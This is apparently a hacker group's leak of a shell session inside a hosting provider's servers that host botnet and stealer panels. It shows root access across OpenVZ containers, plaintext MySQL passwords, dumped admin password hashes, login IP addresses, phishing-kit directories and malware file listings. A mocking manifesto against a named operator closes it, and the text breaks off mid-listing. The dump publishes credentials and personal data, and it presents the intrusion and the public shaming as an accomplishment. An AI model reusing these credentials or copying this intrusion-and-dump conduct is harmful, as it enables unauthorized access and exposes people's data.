+udp 0 0 0.0.0.0:10000 0.0.0.0:* 22852/perl +udp 0 0 0.0.0.0:10000 0.0.0.0:* 350/perl +udp 0 0 0.0.0.0:53957 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 0.0.0.0:5353 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 :::53 :::* 16961/named +udp 0 0 :::53 :::* 24588/named +udp 0 0 :::5353 :::* 29116/avahi-daemon: +udp 0 0 :::56885 :::* 29116/avahi-daemon: + +# cd /home/ + +# ls +total 104 +drwxr-xr-x 21 root root 4096 Oct 3 08:21 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. 
+drwx------ 2 bdgatevm bdgatevm 4096 Aug 22 05:35 bdgatevm +drwx------ 2 bnetvm bnetvm 4096 May 21 02:36 bnetvm +drwx------ 2 fredvm fredvm 4096 Sep 5 08:40 fredvm +drwxr-xr-x 2 root root 4096 May 12 01:07 httpd +drwxr-xr-x 7 root root 4096 Aug 22 06:08 hypervm +drwx------ 2 iodasvm iodasvm 4096 Jun 13 03:25 iodasvm +drwx------ 2 ixdevm ixdevm 4096 Sep 9 09:19 ixdevm +drwx------ 2 lxlabs lxlabs 4096 May 12 01:04 lxlabs +drwx------ 2 rootvm rootvm 4096 Aug 15 04:15 rootvm +drwx------ 2 scriptstvm scriptstvm 4096 May 22 02:41 scriptstvm +drwx------ 2 sethvm sethvm 4096 Oct 3 08:21 sethvm +drwx------ 2 spike80vm spike80vm 4096 Sep 7 01:32 spike80vm +drwx------ 2 spikevm spikevm 4096 Jun 7 09:21 spikevm +drwx------ 2 stansecuvm stansecuvm 4096 May 18 03:40 stansecuvm +drwx------ 2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm +drwx------ 2 truevm truevm 4096 May 16 06:29 truevm +drwx------ 2 wohovm wohovm 4096 Sep 16 03:03 wohovm +drwx------ 2 xtothecvm xtothecvm 4096 Jun 9 08:40 xtothecvm +drwx------ 2 y00vm y00vm 4096 Jun 13 03:02 y00vm + +# du -h +20K ./ixdevm +20K ./scriptstvm +20K ./fredvm +20K ./rootvm +20K ./spikevm +20K ./stansecuvm +20K ./xtothecvm +20K ./iodasvm +20K ./bdgatevm +20K ./y00vm +20K ./stansocksvm +20K ./spike80vm +32K ./lxlabs +20K ./wohovm +8.0K ./httpd +20K ./sethvm +32K ./hypervm/xen/template +40K ./hypervm/xen +1.7M ./hypervm/selfbackup/self/__backup +1.7M ./hypervm/selfbackup/self +1.7M ./hypervm/selfbackup +4.0K ./hypervm/vps/fred.vm/__backup +8.0K ./hypervm/vps/fred.vm +12K ./hypervm/vps +16K ./hypervm/lxguard +8.0K ./hypervm/client/admin +16K ./hypervm/client +1.8M ./hypervm +20K ./bnetvm +20K ./truevm +2.2M . + +# mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. 
+Your MySQL connection id is 717502 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 29818 | ++----------+ +1 row in set (0.00 sec) + +mysql> select * from list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | 76a2173be6393254e72ffa4d6df1030a | 255 | dark | en | +| 2 | test | 598d4c200461b81522a3328565c25f7c | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# 29818 bots here, not bad...^C +# +# We better check out the other VMs + +# vzlist +Warning: Unknown iptable module: ipt_connlimit, skipped + CTID NPROC STATUS IP_ADDR HOSTNAME + 130 64 running 193.107.16.55 true + 140 60 running 193.107.16.197 stansecu + 160 62 running 193.107.16.81 testing + 180 18 running 193.107.16.184 scriptst + 240 59 running 193.107.17.80 spike + 250 34 running 193.107.17.82 vps287.cyberhost.kz + 260 59 running 193.107.17.83 y00 + 270 38 running 193.107.17.66 iodas + 300 34 running 193.107.16.217 Ro0t.cyberhost.kz + 310 23 running 193.107.16.183 stansocks + 340 56 running 193.107.17.69 badgate.cyberhost.kz + 350 59 running 193.107.17.67 fr3d.cyberhost.kz + 360 61 running 193.107.17.68 vps241.cyberhost.kz + 370 61 running 193.107.17.81 vps249.cyberhost.kz + 380 64 running 193.107.16.196 vps254.cyberhost.kz + 390 10 running 193.107.16.185 vps522.cyberhost.kz + +# vzctl enter 130 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 130 + +[root@true /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:55) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 10:42 (6+01:17) +root pts/0 77-20-18-64-dyni Tue Oct 4 
10:04 - down (00:37) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 09:54 (00:47) +root pts/0 p5483a590.dip.t- Sat Oct 1 12:50 - 12:55 (00:05) +root pts/0 p5483a590.dip.t- Sat Oct 1 07:48 - 08:31 (00:43) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:19 (5+23:56) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:11 (00:08) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:10 (00:00) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 09:50 (04:19) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:23 (18:26) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:20 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:19 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:16 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:05 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:54 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:52 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:49 (00:02) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03 (00:31) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32 (00:10) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 11:18 (25+03:30) +root pts/0 p5483df28.dip.t- Thu Sep 1 10:49 - down (00:29) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (01:19) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (00:00) + +[root@true /]# cd /home/ + +[root@true home]# ls -la +total 60 +drwxr-xr-x 15 root root 4096 Oct 1 12:50 . +drwxr-xr-x 23 root root 4096 Oct 10 13:48 .. 
+drwx------ 3 admin admin 4096 Sep 1 11:01 admin +drwx------ 2 axfrdns axfrdns 4096 Sep 1 11:10 axfrdns +drwx------ 2 dnscache dnscache 4096 Sep 1 11:10 dnscache +drwx------ 2 dnslog dnslog 4096 Sep 1 11:10 dnslog +drwxr-xr-x 3 root root 4096 Sep 1 11:12 httpd +drwxr-xr-x 3 root root 4096 Oct 1 07:55 irc +drwxr-xr-x 6 root root 4096 Sep 2 04:15 kloxo +drwxr-xr-x 3 root root 4096 Sep 1 11:00 lxadmin +drwx------ 2 lxlabs lxlabs 4096 Sep 1 10:53 lxlabs +drwxr-xr-x 3 root root 4096 Oct 1 12:52 mocks +drwx------ 2 nouser nogroup 4096 Sep 1 10:53 nouser +drwx------ 2 tinydns tinydns 4096 Sep 1 11:10 tinydns +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls -la +total 36 +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 . +drwxr-xr-x 15 root root 4096 Oct 1 12:50 .. +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 33 Sep 1 11:12 .bash_logout +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 176 Sep 1 11:12 .bash_profile +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 124 Sep 1 11:12 .bashrc +drwxr-xr-x 2 true.cyberhost.kz true.cyberhost.kz 4096 Sep 1 11:12 kloxoscript +drwxr-xr-x 2 root root 4096 Oct 5 05:02 __processed_stats +lrwxrwxrwx 1 root root 42 Sep 1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/ +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 11 Sep 1 11:12 .qmail +drwxr-xr-x 5 true.cyberhost.kz apache 4096 Oct 4 10:31 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls +Design portokalli wordpress +[root@true true.cyberhost.kz]# cd wordpress/ + +[root@true wordpress]# ls +index.php + +[root@true wordpress]# cat index.php +

Visit CyberNetwork

KLICK HIER!!! + +[root@true wordpress]# # nothing to see here + +[root@true true.cyberhost.kz]# logout + +exited from CT 130 + +# vzctl enter 140 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 140 + +[root@stansecu /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:59) +root pts/0 p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15 (04:06) +root pts/1 p57b10668.dip0.t Sun Oct 9 20:17 - 01:20 (05:02) +root pts/0 193.107.17.30 Sun Oct 9 20:05 - 20:30 (00:24) +root pts/0 193.107.17.30 Sun Oct 9 19:49 - 20:05 (00:16) +root pts/0 193.107.17.30 Fri Sep 30 16:00 - 21:16 (05:16) +stanwww pts/0 193.107.17.30 Fri Sep 30 15:59 - 15:59 (00:00) +reboot system boot 2.6.18-238.9.1.e Thu Aug 11 15:15 (59+20:45) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:44 (01:02) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:32 (01:14) +reboot system boot 2.6.18-238.9.1.e Wed Jul 13 17:11 (27+16:18) +root pts/0 193.107.16.213 Sun Jul 10 19:59 - 23:31 (03:32) +root pts/0 92.241.165.69 Fri Jul 1 11:24 - 18:41 (07:16) +root pts/0 92.241.165.69 Thu Jun 30 15:40 - 19:48 (04:07) +root pts/0 92.241.165.69 Tue Jun 28 18:52 - 18:52 (00:00) +root pts/0 92.241.165.69 Wed Jun 22 06:29 - 07:36 (01:07) +root pts/0 92.241.165.69 Mon Jun 20 07:41 - 08:24 (00:43) +root pts/0 92.241.165.69 Tue Jun 14 16:03 - 16:43 (00:39) +root pts/0 92.241.165.69 Mon Jun 13 11:27 - 18:21 (06:54) +root pts/0 92.241.165.69 Sat Jun 11 05:45 - 22:19 (16:33) +root pts/0 92.241.165.69 Mon May 30 12:58 - 13:01 (00:02) +stanwww pts/0 92.241.165.69 Mon May 30 12:58 - 12:58 (00:00) +root pts/0 92.241.165.69 Fri May 27 09:32 - 16:07 (06:34) +root pts/0 92.241.165.69 Sun May 22 20:22 - 20:22 (00:00) +root pts/0 92.241.165.69 Sat May 21 12:08 - 14:10 (02:02) +root pts/0 92.241.165.69 Wed May 18 16:41 - 21:01 (04:20) +reboot system boot 2.6.18-238.9.1.e Wed May 18 16:08 (55+14:20) +root pts/1 92.241.165.69 Wed May 18 15:50 - down (00:17) +root pts/0 77-20-18-64-dyni Wed May 18 12:23 - down (03:45) 
+reboot system boot 2.6.18-238.9.1.e Wed May 18 11:45 (04:22) + +wtmp begins Wed May 18 11:45:54 2011 + +[root@stansecu /]# cd /home/ +[root@stansecu home]# ls +admin axfrdns dnscache dnslog httpd kloxo lxadmin lxlabs nouser stanwww tinydns + +[root@stansecu home]# cd stanwww/ + +[root@stansecu stanwww]# ls -la +total 44 +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 . +drwxr-xr-x 13 root root 4096 May 18 15:00 .. +-rw-r--r-- 1 stanwww stanwww 33 May 18 15:00 .bash_logout +-rw-r--r-- 1 stanwww stanwww 176 May 18 15:00 .bash_profile +-rw-r--r-- 1 stanwww stanwww 124 May 18 15:00 .bashrc +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 kloxoscript +drwxr-xr-x 2 stanwww stanwww 4096 May 21 12:33 pass +drwxr-xr-x 3 stanwww stanwww 4096 Aug 7 17:22 phishingtool +drwxr-xr-x 2 root root 4096 Oct 10 03:57 __processed_stats +lrwxrwxrwx 1 root root 37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/ +-rw-r--r-- 1 stanwww stanwww 11 May 18 15:00 .qmail +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in + +[root@stansecu stanwww]# cd stanley.secure-host.in + +[root@stansecu stanley.secure-host.in]# ls -la +total 220 +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 . +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 .. +drwxr-xr-x 2 stanwww stanwww 4096 Jul 10 11:14 bin +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 cgi-bin +drwxr-xr-x 2 stanwww stanwww 4096 Aug 11 2005 images +-rwxr-xr-x 1 stanwww stanwww 1217 May 18 22:32 index.html +drwxr-xr-x 2 stanwww stanwww 4096 Jul 9 18:25 java +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 phishingtool +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 snapbn +-rw-r--r-- 1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll +drwxr-xr-x 7 stanwww stanwww 4096 Sep 30 16:24 umbralo +drwxr-xr-x 9 stanwww stanwww 4096 May 21 12:32 unique + +[root@stansecu public_html]# cd phishingtool/ + +[root@stansecu phishingtool]# ls -la +total 792 +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 . 
+drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 601 Jul 10 11:45 config.php +-rw-r--r-- 1 stanwww stanwww 2121 May 18 20:17 css.css +-rw-r--r-- 1 stanwww stanwww 1973 May 18 20:17 export.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 12 19:53 exports +-rw-r--r-- 1 stanwww stanwww 750121 May 18 20:17 header.gif +-rw-r--r-- 1 stanwww stanwww 490 May 18 20:17 im.php +-rw-r--r-- 1 stanwww stanwww 1639 May 18 20:17 index.php +-rw-r--r-- 1 stanwww stanwww 2230 May 18 20:17 login.php +-rw-r--r-- 1 stanwww stanwww 111 May 18 20:17 logout.php +-rw-r--r-- 1 stanwww stanwww 1590 May 18 20:17 logs.php +drwxr-xr-x 6 stanwww stanwww 4096 Jul 10 11:48 phishing +-rw-r--r-- 1 stanwww stanwww 889 May 18 20:18 private.php + +tansecu phishingtool]# cat config.php + + +root@stansecu phishingtool]# cd .. +[root@stansecu public_html]# cd snapbn/ + +[root@stansecu snapbn]# ls -la +total 48 +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 . +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 4217 Jun 6 18:56 adv_state.php +drwxr-xr-x 5 stanwww stanwww 4096 Jun 6 19:05 backend +-rw-r--r-- 1 stanwww stanwww 2237 Jun 6 18:56 control.php +drwxr-xr-x 2 stanwww stanwww 4096 Oct 9 16:26 frontend +-rw-r--r-- 1 stanwww stanwww 3047 Jun 6 18:56 gate.php +-rw-r--r-- 1 stanwww stanwww 931 Jun 6 18:56 grab_zone.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 6 18:54 images +-rw-r--r-- 1 stanwww stanwww 38 Jun 6 18:56 ip.php +drwxr-xr-x 3 stanwww stanwww 4096 Jun 6 18:56 theme + +[root@stansecu snapbn]# cat backend/settings.inc.php + + +[root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 4094 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. 
Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| count(*) | ++----------+ +| 2553 | ++----------+ +1 row in set (0.01 sec) + +mysql> SELECT * FROM list_users; ++----+----------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+----------+----------------------------------+-------------+-------+-----+ +| 1 | stan | 37a80cc8fffebfa607292c8814d89473 | 255 | dark | en | +| 2 | youmetoo | 033f706d5832000e32c14ba6453ac415 | 255 | dark | en | ++----+----------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> 2.5k bots ... well +mysql> Ctrl-C -- exit! +Aborted + +[root@stansecu snapbn]# logout + +exited from CT 140 + +# vzctl enter 160 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 160 + +[root@testing /]# cd /home/ + +[root@testing home]# ls -la +total 88 +drwxr-xr-x 22 root root 4096 Sep 23 12:07 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. 
+drwx------ 3 admin admin 4096 May 21 11:17 admin +drwx------ 2 axfrdns axfrdns 4096 May 21 11:28 axfrdns +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 deluxa +drwx------ 2 dnscache dnscache 4096 May 21 11:28 dnscache +drwx------ 2 dnslog dnslog 4096 May 21 11:28 dnslog +drwxr-xr-x 12 root root 4096 Sep 23 12:07 httpd +drwxr-xr-x 6 root root 4096 May 22 04:07 kloxo +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 lolboter +drwxr-xr-x 3 root root 4096 May 21 11:17 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 21 11:03 lxlabs +drwxr-x--- 5 lyrex apache 4096 Sep 1 03:57 lyrex +drwxr-x--- 5 master apache 4096 Sep 24 03:58 master +drwx------ 2 nouser nogroup 4096 May 21 11:03 nouser +drwxr-x--- 5 pep apache 4096 Jul 5 03:57 pep +drwxr-x--- 6 pure apache 4096 Jul 5 22:32 pure +drwxr-x--- 5 sprueche apache 4096 Jun 26 03:57 sprueche +drwxr-x--- 5 symb apache 4096 Jun 15 03:57 symb +drwxr-x--- 5 time apache 4096 May 22 03:57 time +drwx------ 2 tinydns tinydns 4096 May 21 11:28 tinydns +drwxr-x--- 5 winfuture apache 4096 May 23 03:57 winfuture + +root@testing home]# cd deluxa/ + +[root@testing deluxa]# ls -la +total 36 +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 . +drwxr-xr-x 22 root root 4096 Sep 23 12:07 .. 
+-rw-r--r-- 1 deluxa deluxa 33 Jun 14 10:46 .bash_logout +-rw-r--r-- 1 deluxa deluxa 176 Jun 14 10:46 .bash_profile +-rw-r--r-- 1 deluxa deluxa 124 Jun 14 10:46 .bashrc +drwxr-xr-x 5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in +drwxr-xr-x 2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript +drwxr-xr-x 2 root root 4096 Jun 15 03:57 __processed_stats +lrwxrwxrwx 1 root root 35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/ +-rw-r--r-- 1 deluxa deluxa 11 Jun 14 10:46 .qmail + +[root@testing deluxa]# cd public_html/ + +[root@testing public_html]# ls +cgi-bin images index.html snapbn + +[root@testing public_html]# cat snapbn/ +adv_state.php backend/ control.php frontend/ gate.php grab_zone.php images/ ip.php theme/ + +[root@testing public_html]# cat snapbn/backend/ +classes/ flags/ GeoIP.dat geoip.inc index.php js.js language/ settings.inc.php settings.inc.php_ system.php + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + + +[root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92 +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 602007 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+--------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+--------+----------------------------------+-------------+-------+-----+ +| 1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 | 255 | dark | en | ++----+--------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 45 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! 
+Aborted + +[root@testing lolboter]# cd /home/lolboter/public_html/ + +[root@testing public_html]# ls -la +total 28 +drwxrwxrwx 6 lolboter apache 4096 Oct 18 16:50 . +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 .. +drwxrwxrwx 2 lolboter lolboter 4096 Aug 9 11:45 cgi-bin +drwxrwxrwx 2 lolboter lolboter 4096 Aug 11 2005 images +-rwxrwxrwx 1 lolboter lolboter 1213 Aug 9 11:45 index.html +drwxr-xr-x 3 lolboter lolboter 4096 Aug 9 13:06 snapbn +drwxrwxrwx 6 lolboter lolboter 4096 Aug 9 12:55 upload + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e6053eb8d35e02ae40beeeacef203c1a | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 349 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | lyrex | d43a389b900aff13aa56477e7f3618df | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 658 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! 
+Aborted + +[root@testing home]# logout +exited from CT 160 + +# vzctl enter 240 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 240 + +[root@spike /]# cd /home + +[root@spike home]# ls -la +total 52 +drwxr-xr-x 13 root root 4096 Jun 7 18:11 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. +drwx------ 3 admin admin 4096 May 22 13:38 admin +drwx------ 2 axfrdns axfrdns 4096 May 22 13:51 axfrdns +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 bnet +drwx------ 2 dnscache dnscache 4096 May 22 13:51 dnscache +drwx------ 2 dnslog dnslog 4096 May 22 13:51 dnslog +drwxr-xr-x 3 root root 4096 Jun 7 18:11 httpd +drwxr-xr-x 6 root root 4096 Jun 8 04:07 kloxo +drwxr-xr-x 3 root root 4096 May 22 13:37 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 22 13:23 lxlabs +drwx------ 2 nouser nogroup 4096 May 22 13:23 nouser +drwx------ 2 tinydns tinydns 4096 May 22 13:51 tinydns + +[root@spike home]# cd httpd + +[root@spike httpd]# ls -la +total 16 +drwxr-xr-x 3 root root 4096 Jun 7 18:11 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rwxr-xr-x 1 root root 111 May 22 13:51 nobody.sh +drwxrwxr-x 6 bnet apache 4096 Jun 7 18:11 spike.secure-host.in + +[root@spike httpd]# cd .. + +[root@spike home]# cd bnet + +[root@spike bnet]# ls -la +total 36 +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rw-r--r-- 1 bnet bnet 33 Jun 7 18:11 .bash_logout +-rw-r--r-- 1 bnet bnet 176 Jun 7 18:11 .bash_profile +-rw-r--r-- 1 bnet bnet 124 Jun 7 18:11 .bashrc +drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 kloxoscript +drwxr-xr-x 2 root root 4096 Sep 11 03:57 __processed_stats +lrwxrwxrwx 1 root root 32 Jun 7 18:11 public_html -> /home/bnet/spike.secure-host.in/ +-rw-r--r-- 1 bnet bnet 11 Jun 7 18:11 .qmail +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 spike.secure-host.in + +[root@spike bnet]# cd public_html + +[root@spike public_html]# ls -la +total 24 +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 . +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 .. 
+drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 cgi-bin +drwxr-xr-x 2 bnet bnet 4096 Aug 11 2005 images +-rwxr-xr-x 1 bnet bnet 1213 Jun 7 18:11 index.html +drwxr-xr-x 6 bnet bnet 4096 Jun 7 19:04 snapbn + +[root@spike public_html]# cat snapbn/backend/settings.inc.php + + +[root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 10731 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e48e13207341b6bffb7fb1622282247b | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 1321 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@spike public_html]# logout +exited from CT 240 + +... + +We could actually post content of the other VMs but, believe us, it's +always the same sort of bullshit. Bot and stealer panels everywhere, +so this would just be a waste of your time ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Secure-Host.in }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ As we already pointed out, we concluded that it +,;' \ /-(.;, ) would be best to crush every single project of + ) / ) / k!LLu with our iron fist of 0day madness. One of + // || the excrements he produces is Secure-Host.in + )_\ )_\ formerly known as Cyberhost.kz where he basically +offers "secure" hosting. 
Well by now it should be clear that if +somebody like k!LLu talks about "security", he actually has no clue +about that kind of topic. The fact is that he cannot secure his +systems because he really does not know how. We're confident that the +chapter 'k!LLu' can be closed once and for all now, maybe someone even +drew a lesson from it. + +# pwd +/home/hosting + +# ls -la +total 48 +drwxr-x--- 6 hosting www 512 May 16 14:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 17 hosting www 1536 May 16 14:50 cp.secure-host.in +drwxr-xr-x 2 root www 1024 May 16 14:09 ioncube +drwxrwx--- 5 hosting www 512 Aug 19 04:51 secure-host.in +drwxrwx--- 2 hosting www 13312 Oct 16 10:48 temp + +# cd secure-host.in/ + +# ls -laR +total 24 +drwxrwx--- 5 hosting www 512 Aug 19 04:51 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. +drwxr-xr-x 2 root www 512 May 16 20:57 fileup +drwxr-xr-x 2 root www 512 May 20 10:12 imgupload +-rw-r--r-- 1 hosting www 1680 Aug 19 04:52 index.html +drwxr-xr-x 2 root www 512 May 18 21:56 static + +./fileup: +total 912 +drwxr-xr-x 2 root www 512 May 16 20:57 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 324608 May 16 20:58 Snap_SmilingBandit.exe +-rw-r--r-- 1 root www 118784 May 16 20:53 smile.exe + +./imgupload: +total 4232 +drwxr-xr-x 2 root www 512 May 20 10:12 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 2130942 May 20 10:11 samsung.jpg + +./static: +total 120 +drwxr-xr-x 2 root www 512 May 18 21:56 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 57198 May 18 22:08 sechost.png + +# cd .. + +# cd cp.secure-host.in + +# ls -la +total 1296 +drwxrwx--- 17 hosting www 1536 May 16 14:50 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. 
+-rw-r--r-- 1 root www 3013 May 16 13:31 README.txt +drwxr-xr-x 6 root www 3584 May 16 13:34 admin +-rw-r--r-- 1 root www 430 May 16 13:31 aff.php +-rw-r--r-- 1 root www 15877 May 16 13:31 affiliates.php +-rw-r--r-- 1 root www 11667 May 16 13:31 announcements.php +-rw-r--r-- 1 root www 7513 May 16 13:31 announcementsrss.php +drwxrwxrwx 2 root www 512 May 16 13:36 attachments +-rw-r--r-- 1 root www 6070 May 16 13:31 banned.php +-rw-r--r-- 1 root www 79378 May 16 13:31 cart.php +-rw-r--r-- 1 root www 120326 May 16 13:31 clientarea.php +-rwxrwxrwx 1 root www 281 May 16 14:41 configuration.php +-rw-r--r-- 1 root www 16445 May 16 13:31 configuressl.php +-rw-r--r-- 1 root www 9616 May 16 13:31 contact.php +-rw-r--r-- 1 root www 13871 May 16 13:31 creditcard.php +-rw-r--r-- 1 root www 23654 May 16 13:31 dbconnect.php +-rw-r--r-- 1 root www 15873 May 16 13:31 dl.php +-rw-r--r-- 1 root www 7938 